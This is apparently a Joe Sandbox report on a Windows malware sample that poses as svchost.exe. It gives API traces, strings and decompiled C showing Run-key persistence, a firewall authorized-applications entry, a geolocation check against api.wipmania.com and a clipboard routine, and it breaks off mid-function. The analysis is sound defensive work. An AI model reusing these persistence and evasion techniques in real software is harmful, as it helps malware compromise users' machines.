Sleep.KERNEL32(000001F4), ref: 00AB3264
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB326F
Sleep.KERNEL32(00001388), ref: 00AB32A1
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB32B1
PathFileExistsW.KERNELBASE(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB32BE
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB32FD
Sleep.KERNEL32(00001388), ref: 00AB330A
FindWindowA.USER32 ref: 00AB3317
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB3331
SetForegroundWindow.USER32(00000000), ref: 00AB333E
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB334E
CopyFileA.KERNEL32(3r38r38r838r838r388r838r83,4tt4t4wwt44t4tw4tw4wt4tw4t,00000000), ref: 00AB3360
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB336B
SetFocus.USER32(00000000), ref: 00AB3378
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB3383
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB338E
Sleep.KERNEL32(00000BB8), ref: 00AB3399
DeleteFileW.KERNEL32(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB33CB
Sleep.KERNEL32(00001388), ref: 00AB33D6
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB33E6
Sleep.KERNELBASE(000001F4), ref: 00AB3407
ExitProcess.KERNEL32 ref: 00AB3429
CreateMutexA.KERNELBASE(00000000,00000000,?), ref: 00AB37FF
GetLastError.KERNEL32 ref: 00AB380B
ExitProcess.KERNEL32 ref: 00AB381A
PathFileExistsW.KERNELBASE(3r37grg73g7e37geg73g7eg73g7e), ref: 00AB38A1
MoveFileA.KERNEL32 ref: 00AB38B9
MoveFileA.KERNEL32 ref: 00AB38F0
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB38FB
Sleep.KERNEL32(000007D0), ref: 00AB3908
FindWindowA.USER32 ref: 00AB3915
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB3934
CopyFileA.KERNEL32(3r38r38r838r838r388r838r83,4tt4t4wwt44t4tw4tw4wt4tw4t,00000000), ref: 00AB3946
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB3956
DeleteFileA.KERNEL32(3r38r38r838r838r388r838r83), ref: 00AB3961
Sleep.KERNEL32(00002710), ref: 00AB396C
MoveFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n,w4rr4w4rw4rwr44rr4w4rr44r), ref: 00AB39A3
MoveFileW.KERNEL32(w4rr4w4rw4rwr44rr4w4rr44r,3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m), ref: 00AB39B3
FindWindowA.USER32 ref: 00AB39C2
MoveFileA.KERNEL32 ref: 00AB39E5
Sleep.KERNEL32(00001F40), ref: 00AB39F0
DeleteFileW.KERNEL32(nw55n5nww5n5nww5nw5n5n5n5n), ref: 00AB39FB
MoveFileA.KERNEL32 ref: 00AB3A0B
Sleep.KERNEL32(000007D0), ref: 00AB3A16
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AB3A29

Strings

4tt4t4wwt44t4tw4tw4wt4tw4t, xrefs: 00AB2E11, 00AB2E88, 00AB30A7, 00AB30EE, 00AB3312, 00AB3356, 00AB3910, 00AB393C, 00AB3A06, 00AB3A35, 00AB3A49, 00AB3ADC, 00AB3B05, 00AB3B3D, 00AB3BC7, 00AB3CBD, 00AB3D48, 00AB3E5C, 00AB3FBB, 00AB3FF2, 00AB4047, 00AB40C5, 00AB4392, 00AB43FA, 00AB471F, 00AB48B2, 00AB4960, 00AB49A7, 00AB4BDD
B, xrefs: 00AB4739
svchost., xrefs: 00AB3F0E
Host Process for Windows Services, xrefs: 00AB349D
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00AB4ECC
nw55n5nww5n5nww5nw5n5n5n5n, xrefs: 00AB2B4C, 00AB2BDE, 00AB2C35, 00AB2C97, 00AB2DC2, 00AB2E62, 00AB2ED7, 00AB2F3C, 00AB3046, 00AB311E, 00AB32AC, 00AB32F8, 00AB3349, 00AB33E1, 00AB392F, 00AB399E, 00AB39F6, 00AB3C66, 00AB3CE7, 00AB402B, 00AB451D, 00AB4532, 00AB4576, 00AB45CD, 00AB467A, 00AB4707, 00AB4765, 00AB4785, 00AB47D4, 00AB4823, 00AB4922, 00AB49CC, 00AB4ACB, 00AB4B56, 00AB4BB8, 00AB4C91
2uu5uii55i5i25i52i5ii2525i5i25i, xrefs: 00AB2E95, 00AB3163, 00AB3235, 00AB3A01, 00AB3AB8, 00AB3AD7, 00AB3BD9, 00AB3F9C, 00AB3FB6, 00AB3FED, 00AB41AE, 00AB43AC, 00AB4792, 00AB4A0E
%ls:*:Enabled:%ls, xrefs: 00AB4DC7
%ls\%ls, xrefs: 00AB4D59
%ls\%d%d%d, xrefs: 00AB4D36
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00AB4E08
3r38r38r838r838r388r838r83, xrefs: 00AB2AF2, 00AB2B1B, 00AB2B87, 00AB2BF9, 00AB2CA7, 00AB2D54, 00AB2D6F, 00AB2E16, 00AB2F31, 00AB2F4C, 00AB308C, 00AB3172, 00AB3245, 00AB332C, 00AB335B, 00AB3366, 00AB38AF, 00AB38E6, 00AB38F6, 00AB3941, 00AB395C, 00AB39BD, 00AB39DB, 00AB3AC7, 00AB3B0A, 00AB3B15, 00AB3B42, 00AB3B5C, 00AB3BCC, 00AB3C4B, 00AB3CC8, 00AB3D4D, 00AB3D6D, 00AB3DC4, 00AB3DDE, 00AB3E31, 00AB3E41, 00AB3E61, 00AB3F5D, 00AB3F7B, 00AB3FAB, 00AB3FC6, 00AB404C, 00AB40AF, 00AB410F, 00AB41A1, 00AB41BF, 00AB428D, 00AB4323, 00AB4333, 00AB43EF, 00AB43FF, 00AB44AF, 00AB44BA, 00AB44D0, 00AB4548, 00AB4695, 00AB46DD, 00AB4724, 00AB4818, 00AB4886, 00AB49C1, 00AB4A1D, 00AB4A84, 00AB4B46, 00AB4B81, 00AB4BC3, 00AB4BF7
3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m, xrefs: 00AB2BA2, 00AB2C74, 00AB2CC2, 00AB319E, 00AB31F1, 00AB394C, 00AB39A9, 00AB3D7D, 00AB45B5, 00AB45E8, 00AB4A49, 00AB4AA7, 00AB4AD6, 00AB4C27
Z, xrefs: 00AB3B91
2, xrefs: 00AB3B9B
%s%s, xrefs: 00AB54E0
%ls:Zone.Identifier, xrefs: 00AB3ED5
w4rr4w4rw4rwr44rr4w4rr44r, xrefs: 00AB2BA7, 00AB2C14, 00AB2CD8, 00AB2D89, 00AB2D9F, 00AB2F41, 00AB2F67, 00AB3061, 00AB3139, 00AB3188, 00AB31A3, 00AB31D9, 00AB31F6, 00AB32A7, 00AB32F3, 00AB3344, 00AB33DC, 00AB392A, 00AB3951, 00AB3999, 00AB39AE, 00AB3A7D, 00AB3C6B, 00AB3F91, 00AB4026, 00AB4146, 00AB421A, 00AB44DB, 00AB44E0, 00AB452D, 00AB4560, 00AB45FE, 00AB46AF, 00AB46C5, 00AB4702, 00AB4780, 00AB4828, 00AB483E, 00AB493D, 00AB49E7, 00AB4A33, 00AB4A4E, 00AB4A8F, 00AB4AAC, 00AB4AC6, 00AB4ADB, 00AB4B3B, 00AB4B51, 00AB4B61, 00AB4BB3, 00AB4C1C, 00AB4C2C, 00AB4C81, 00AB4C8C
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 00AB4E6A
tyu6uyur, xrefs: 00AB342F
http://www.yandex.ru/, xrefs: 00AB2CEB, 00AB2EFA, 00AB300F, 00AB3A5C, 00AB3C1F, 00AB3D27, 00AB408E, 00AB41F9, 00AB42EC, 00AB4611, 00AB47EC, 00AB48F6
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 00AB2C63, 00AB2EAE, 00AB2FE9, 00AB3A24, 00AB3BF2, 00AB3D05, 00AB406C, 00AB41D7, 00AB42CA, 00AB45A4, 00AB47AB, 00AB48D0
(#, xrefs: 00AB3E25
3r37g37e7g3ge3ge7g37ge737eg, xrefs: 00AB31B0, 00AB3AE9, 00AB3FD3, 00AB4230, 00AB42AC, 00AB4A5B
3r37grg73g7e37geg73g7eg73g7e, xrefs: 00AB2B36, 00AB2B51, 00AB2BBD, 00AB2BD3, 00AB2BE3, 00AB2C2A, 00AB2C3A, 00AB2C50, 00AB2C8C, 00AB2C9C, 00AB2D3E, 00AB2DC7, 00AB2DD2, 00AB2DF9, 00AB2E57, 00AB2E67, 00AB2E7D, 00AB2EDC, 00AB2EE7, 00AB2F1B, 00AB2FBE, 00AB3030, 00AB304B, 00AB3079, 00AB309C, 00AB3113, 00AB3123, 00AB326A, 00AB32B9, 00AB337E, 00AB3389, 00AB33C6, 00AB389C, 00AB3DEE, 00AB4522, 00AB457B, 00AB4591, 00AB45D2, 00AB4664, 00AB467F, 00AB476A, 00AB47D9, 00AB4927, 00AB49D1, 00AB4B6E
wgg4gwg4wgw4w4gw4gw4g4wghw4h, xrefs: 00AB2B20, 00AB2B8C, 00AB2CAC, 00AB2D59, 00AB2F51, 00AB3091, 00AB323A, 00AB38B4, 00AB38EB, 00AB39E0, 00AB3ACC, 00AB3B1A, 00AB3B61, 00AB3C50, 00AB3C5B, 00AB3CCD, 00AB3D72, 00AB3DE3, 00AB3E36, 00AB3E46, 00AB4114, 00AB41C4, 00AB4292, 00AB4318, 00AB4328, 00AB4363, 00AB4486, 00AB488B
svchost.exe, xrefs: 00AB3452
,, xrefs: 00AB2E2B
X, xrefs: 00AB472F
<, xrefs: 00AB4175
n#, xrefs: 00AB4468
", xrefs: 00AB416B

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: File$Sleep$Delete$Move$Window$Internet$CloseFindOpen$Handle$Show$Foreground$ExistsPath$CopyExitProcess$CreateErrorFocusLastMutex
String ID: "$%ls:*:Enabled:%ls$%ls:Zone.Identifier$%ls\%d%d%d$%ls\%ls$%s%s$(#$,$2$2uu5uii55i5i25i52i5ii2525i5i25i$3r37g37e7g3ge3ge7g37ge737eg$3r37grg73g7e37geg73g7eg73g7e$3r38r38r838r838r388r838r83$3rm3mrk3kmr3mrl3mrm3mr3lmmrl3m$4tt4t4wwt44t4tw4tw4wt4tw4t$<$B$Host Process for Windows Services$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$Software\Microsoft\Windows\CurrentVersion\Run\$X$Z$http://www.yandex.ru/$n#$nw55n5nww5n5nww5nw5n5n5n5n$svchost.$svchost.exe$tyu6uyur$w4rr4w4rw4rwr44rr4w4rr44r$wgg4gwg4wgw4w4gw4gw4g4wghw4h
API String ID: 301308742-3935118898
Opcode ID: d1c8321f0eac33f55e63d9c64156d984b1ee94e0751733e00503d6632c233298
Instruction ID: 107af68951662eb7caa0276ef6541af07487e1ca8143100768fd5b37af479788
Opcode Fuzzy Hash: d1c8321f0eac33f55e63d9c64156d984b1ee94e0751733e00503d6632c233298
Instruction Fuzzy Hash: 77232F75A40354ABDB20EBE5EC4DBDA7778BB48701F008684F70AA61E3CBB55A85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 00AB561A, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 74%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t39;
				intOrPtr* _t40;
				intOrPtr _t41;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr* _t54;
				intOrPtr _t57;
				intOrPtr _t60;

				_push(0xffffffff);
				_push(0xab75b0);
				_push(0xab57a0);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t57;
				_v28 = _t57 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0xabaac8 =  *0xabaac8 | 0xffffffff;
				 *0xabaacc =  *0xabaacc | 0xffffffff;
				_t23 = __p__fmode();
				_t45 =  *0xabaac4; // 0x0
				 *_t23 = _t45;
				_t24 = __p__commode();
				_t46 =  *0xabaac0; // 0x0
				 *_t24 = _t46;
				 *0xabaad0 = _adjust_fdiv;
				_t27 = E00AB5799( *_adjust_fdiv);
				_t60 =  *0xaba890; // 0x1
				if(_t60 == 0) {
					__setusermatherr(E00AB5796);
				}
				E00AB5784(_t27);
				_push(0xab900c);
				_push(0xab9008);
				L00AB577E();
				_t29 =  *0xabaabc; // 0x0
				_v112 = _t29;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0xabaab8,  &_v112);
				_push(0xab9004);
				_push(0xab9000);
				L00AB577E();
				_t54 =  *_acmdln;
				_v120 = _t54;
				if( *_t54 != 0x22) {
					while( *_t54 > 0x20) {
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				} else {
					do {
						_t54 = _t54 + 1;
						_v120 = _t54;
						_t41 =  *_t54;
					} while (_t41 != 0 && _t41 != 0x22);
					if( *_t54 == 0x22) {
						L6:
						_t54 = _t54 + 1;
						_v120 = _t54;
					}
				}
				_t36 =  *_t54;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t54);
				_push(0);
				_t39 = GetModuleHandleA(0);
				_push(_t39); // executed
				E00AB2AB0(); // executed
				_v108 = _t39;
				exit(_t39);
				_t40 = _v24;
				_t48 =  *((intOrPtr*)( *_t40));
				_v124 = _t48;
				_push(_t40);
				_push(_t48);
				L00AB5778();
				return _t40;
			}

0x00ab561d
0x00ab561f
0x00ab5624
0x00ab562f
0x00ab5630
0x00ab563d
0x00ab5642
0x00ab5647
0x00ab564e
0x00ab5655
0x00ab565c
0x00ab5662
0x00ab5668
0x00ab566a
0x00ab5670
0x00ab5676
0x00ab567f
0x00ab5684
0x00ab5689
0x00ab568f
0x00ab5696
0x00ab569c
0x00ab569d
0x00ab56a2
0x00ab56a7
0x00ab56ac
0x00ab56b1
0x00ab56b6
0x00ab56cf
0x00ab56d5
0x00ab56da
0x00ab56df
0x00ab56ec
0x00ab56ee
0x00ab56f4
0x00ab5730
0x00ab5735
0x00ab5736
0x00ab5736
0x00ab56f6
0x00ab56f6
0x00ab56f6
0x00ab56f7
0x00ab56fa
0x00ab56fc
0x00ab5707
0x00ab5709
0x00ab5709
0x00ab570a
0x00ab570a
0x00ab5707
0x00ab570d
0x00ab5711
0x00000000
0x00000000
0x00ab5717
0x00ab571e
0x00ab5728
0x00ab573d
0x00ab572a
0x00ab572a
0x00ab572a
0x00ab573e
0x00ab573f
0x00ab5740
0x00ab5742
0x00ab5748
0x00ab5749
0x00ab574e
0x00ab5752
0x00ab5758
0x00ab575d
0x00ab575f
0x00ab5762
0x00ab5763
0x00ab5764
0x00ab576b

APIs

__set_app_type.MSVCRT ref: 00AB5647
__p__fmode.MSVCRT ref: 00AB565C
__p__commode.MSVCRT ref: 00AB566A
__setusermatherr.MSVCRT ref: 00AB5696
_initterm.MSVCRT ref: 00AB56AC
__getmainargs.MSVCRT ref: 00AB56CF
_initterm.MSVCRT ref: 00AB56DF
GetStartupInfoA.KERNEL32(?), ref: 00AB571E
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00AB5742
exit.MSVCRT ref: 00AB5752
_XcptFilter.MSVCRT ref: 00AB5764

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 6bfdf86aeecaae8d65990340a15755e777450d46899666a1594151659f291d22
Instruction ID: be34437ae8ba5c183715dcdf2462e04546e1cd69957ec84de8b5276946bfba65
Opcode Fuzzy Hash: 6bfdf86aeecaae8d65990340a15755e777450d46899666a1594151659f291d22
Instruction Fuzzy Hash: AD414CB1D00708EFDB20DFF4D945AE97BBCBB09710F240A1AE542972A3DB745882CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2930, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00AB2930() {
				void _v108;
				void* _v112;
				long _v116;
				void* _v120;
				char* _v124;
				void* _t20;
				void* _t24;

				memset( &_v108, 0, 0x64);
				_t20 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 0, 0, 0, 0); // executed
				_v120 = _t20;
				if(_v120 == 0) {
					L6:
					InternetCloseHandle(_v120);
					return 0;
				}
				_t24 = InternetOpenUrlA(_v120, "http://api.wipmania.com/", 0, 0, 0, 0); // executed
				_v112 = _t24;
				if(_v112 == 0) {
					L5:
					InternetCloseHandle(_v112); // executed
					goto L6;
				}
				InternetReadFile(_v112,  &_v108, 0x63,  &_v116); // executed
				_v124 = E00AB29F0( &_v108, 0x3e);
				if(_v124 == 0) {
					goto L5;
				}
				_v124 =  &(_v124[1]);
				if(strcmp(_v124, "UA") != 0) {
					goto L5;
				}
				return 1;
			}

0x00ab293e
0x00ab2953
0x00ab2959
0x00ab2960
0x00ab29d9
0x00ab29dd
0x00000000
0x00ab29e3
0x00ab2973
0x00ab2979
0x00ab2980
0x00ab29cf
0x00ab29d3
0x00000000
0x00ab29d3
0x00ab2990
0x00ab29a4
0x00ab29ab
0x00000000
0x00000000
0x00ab29b3
0x00ab29c9
0x00000000
0x00000000
0x00000000

APIs

memset.MSVCRT ref: 00AB293E
InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00AB2953
InternetOpenUrlA.WININET(00000000,http://api.wipmania.com/,00000000,00000000,00000000,00000000), ref: 00AB2973
InternetReadFile.WININET(00000000,?,00000063,?), ref: 00AB2990

Part of subcall function 00AB29F0: strchr.MSVCRT ref: 00AB29FB

strcmp.MSVCRT ref: 00AB29BF
InternetCloseHandle.WININET(00000000), ref: 00AB29D3
InternetCloseHandle.WININET(00000000), ref: 00AB29DD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 00AB294E
http://api.wipmania.com/, xrefs: 00AB296A

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Internet$CloseHandleOpen$FileReadmemsetstrchrstrcmp
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36$http://api.wipmania.com/
API String ID: 2867819534-2731082668
Opcode ID: e55530bcc3e146885bd838cd0160a9dedc5d3c7342a91971fbc3c50eb1c5e8fe
Instruction ID: d5ca795a210897c04b946364cf256ea6aea46bb124c77c1e975ce91bc323fd19
Opcode Fuzzy Hash: e55530bcc3e146885bd838cd0160a9dedc5d3c7342a91971fbc3c50eb1c5e8fe
Instruction Fuzzy Hash: F8211A71E40308ABEB20EBF4DC4ABEDB77CAB44B01F204619B6056B1D3D6B5A554CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1E00, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 55
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00AB1E00() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				long _v20;
				signed int _v24;
				void* _v28;
				char _v32;
				int _v36;
				long _t31;
				long _t35;
				void* _t44;

				_v20 = GetLogicalDrives();
				_v16 = 0;
				_v12 = 0x80000002;
				_v8 = 0x80000001;
				_v24 = 0;
				while(_v24 < 2) {
					_t31 = RegOpenKeyExW( *(_t44 + _v24 * 4 - 8), L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer", 0, 0x20019,  &_v28); // executed
					if(_t31 == 0) {
						_v32 = 0;
						_v36 = 4;
						_t35 = RegQueryValueExW(_v28, L"NoDrives", 0, 0,  &_v32,  &_v36); // executed
						if(_t35 == 0 && _v32 != 0) {
							_v16 = _v16 | _v32;
						}
						RegCloseKey(_v28);
					}
					_v24 = _v24 + 1;
				}
				return  !_v16 & _v20;
			}

0x00ab1e0c
0x00ab1e0f
0x00ab1e16
0x00ab1e1d
0x00ab1e24
0x00ab1e36
0x00ab1e54
0x00ab1e5c
0x00ab1e5e
0x00ab1e65
0x00ab1e81
0x00ab1e89
0x00ab1e97
0x00ab1e97
0x00ab1e9e
0x00ab1e9e
0x00ab1e33
0x00ab1e33
0x00ab1eb1

APIs

GetLogicalDrives.KERNEL32 ref: 00AB1E06
RegOpenKeyExW.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 00AB1E54
RegQueryValueExW.KERNELBASE(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00AB1E81
RegCloseKey.ADVAPI32(?), ref: 00AB1E9E

Strings

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, xrefs: 00AB1E47
NoDrives, xrefs: 00AB1E78

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: CloseDrivesLogicalOpenQueryValue
String ID: NoDrives$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
API String ID: 2666887985-3471754645
Opcode ID: 1b1d6e54ac637df5bcaef7a8a1eac1d0e3fa9f898a936e129871aed2ff1faa7d
Instruction ID: 1f7b6b42585f025a5c0ea6387da6e88f332956552e14420fec0f26908f78fea1
Opcode Fuzzy Hash: 1b1d6e54ac637df5bcaef7a8a1eac1d0e3fa9f898a936e129871aed2ff1faa7d
Instruction Fuzzy Hash: 6011F9B1E4020AEBDB10DFD1C959BFEB7B8FB48304F108508E911A7281D378AA45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00AB2A10, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00AB2A10(char* _a4, intOrPtr* _a8) {
				void* _v8;
				char _v9;
				void* _v16;
				void _v20;
				long _v24;
				void* _t24;

				_v9 = 0;
				_v16 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", 1, 0, 0, 0);
				if(_v16 != 0) {
					_t24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0); // executed
					_v8 = _t24;
					if(_v8 != 0) {
						_v24 = 4;
						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
						if(_v20 > 0x1b58 && _v20 !=  *_a8) {
							 *_a8 = _v20;
							_v9 = 1;
						}
						InternetCloseHandle(_v8);
					}
					InternetCloseHandle(_v16);
				}
				return _v9;
			}

0x00ab2a16
0x00ab2a2d
0x00ab2a34
0x00ab2a46
0x00ab2a4c
0x00ab2a53
0x00ab2a55
0x00ab2a6f
0x00ab2a7c
0x00ab2a8e
0x00ab2a90
0x00ab2a90
0x00ab2a98
0x00ab2a98
0x00ab2aa2
0x00ab2aa2
0x00ab2aae

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36,00000001,00000000,00000000,00000000), ref: 00AB2A27
InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00AB2A46
HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 00AB2A6F
InternetCloseHandle.WININET(00000000), ref: 00AB2A98
InternetCloseHandle.WININET(00000000), ref: 00AB2AA2

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36, xrefs: 00AB2A22

Memory Dump Source

Source File: 00000001.00000002.1647531107.0000000000AB1000.00000020.00020000.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000001.00000002.1647519351.0000000000AB0000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647580242.0000000000AB6000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.1647620065.0000000000AB9000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.1647653810.0000000000ABA000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.1647686167.0000000000ABB000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ab0000_svchost.jbxd

Similarity

API ID: Internet$CloseHandleOpen$HttpInfoQuery
String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
API String ID: 3871184103-3026876182
Opcode ID: a76049f20f01ebe030c6cd4ae5d68c45005d04b43dceb6d291c68dd6a3142fbf
Instruction ID: c370c2151fd8211e63e189590c5645fbec4eeb7acfa6a4c619e21be68d7460f1
Opcode Fuzzy Hash: a76049f20f01ebe030c6cd4ae5d68c45005d04b43dceb6d291c68dd6a3142fbf
Instruction Fuzzy Hash: 9B115E74A40208FFDB20DFD4DC49FEEB779AB04300F108549E9116B2D2C7B5AA01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00AB1660, Relevance: 9.0, APIs: 6, Instructions: 29
clipboardsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00AB1660() {
				char* _v8;
				void* _v12;
				void* _t17;

				L1:
				while(1) {
